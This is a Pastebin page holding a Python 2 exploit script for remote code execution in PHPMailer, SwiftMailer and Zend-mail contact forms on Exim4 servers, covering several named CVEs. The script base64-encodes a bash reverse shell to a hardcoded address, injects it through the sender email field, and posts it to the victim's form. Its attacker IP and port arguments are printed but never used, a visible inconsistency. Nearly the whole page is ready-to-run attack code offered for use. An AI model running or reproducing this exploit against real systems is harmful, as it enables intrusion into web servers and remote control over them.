Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import argparse
- import urllib
- import urllib2
- import base64
- # Prepare command for Exim expansion mode in order
- def prepare_cmd(cmd):
- return '${run{${base64d:%s}}}' % base64.b64encode(cmd)
- # Send Request method
- def send_request(req):
- try:
- urllib2.urlopen(req)
- except urllib2.HTTPError, e:
- print "[!] Got HTTP error: [%d] when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % e.code
- exit(3)
- except urllib2.URLError, err:
- print "[!] Got the '%s' error when trying to reach " + req.get_full_url() + " - Check the URL!\n\n" % err.reason
- exit(4)
- # Parse input args
- parser = argparse.ArgumentParser(prog='rce_phpmailer_exim4.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version')
- parser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')
- parser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')
- parser.add_argument('-ip', dest='ATTACKER_IP', required=True, help='Attacker IP for reverse shell')
- parser.add_argument('-p', dest='ATTACKER_PORT', required=False, help='Attackers Port for reverse shell', default="8888")
- parser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST "action" field name', default="send")
- parser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST "name of sender" field name', default="name")
- parser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST "email" field name', default="email")
- parser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST "message" field name', default="msg")
- args = parser.parse_args()
- CONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT
- # Show params
- print """[+] Setting vars to: \n
- WEBAPP_BASE_URL = [%s]
- CONTACT_SCRIPT = [%s]
- ATTACKER_IP = [%s]
- ATTACKER_PORT = [%s]
- POST_ACTION = [%s]
- POST_NAME = [%s]
- POST_EMAIL = [%s]
- POST_MSG = [%s]
- """ % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.ATTACKER_IP, args.ATTACKER_PORT, args.POST_ACTION, args.POST_NAME, args.POST_EMAIL, args.POST_MSG)
- # Ask for mail library
- print "[+] Choose your target / payload: "
- print "\033[1;34m"
- print """[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)"""
- print """ SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)"""
- print """ Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"""
- print """[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass"""
- print "\033[0m"
- try:
- target = int(raw_input('[?] Select target [1-2]: '))
- except ValueError:
- print "Not a valid choice. Exiting\n"
- exit(2)
- if (target>2):
- print "No such target. Exiting\n"
- exit(3)
- ################################
- # Payload
- ################################
- cmd = "/bin/bash -c '0<&196;exec 196<>/dev/tcp/192.168.1.19/1337;nohup sh <&196 >&196 2>&196 &'"
- prepared_cmd = prepare_cmd(cmd)
- payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
- # Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
- if target == 2:
- payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
- ################################
- # Attack episode
- # This step will execute the reverse shell
- ################################
- # Form fields
- post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
- # Print relevant information
- print "\n[+] Executing command on victim server\n"
- print '[!] command: [%s]' % cmd
- print '[!] payload: [%s]' % payload
- print '[!] post_fields: [%s]\n' % str(post_fields)
- data = urllib.urlencode(post_fields)
- req = urllib2.Request(CONTACT_SCRIPT_URL, data)
- send_request(req)
- print "\033[1;32m[+] You should check your listener and cross the fingers ;)\033[0m\n"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement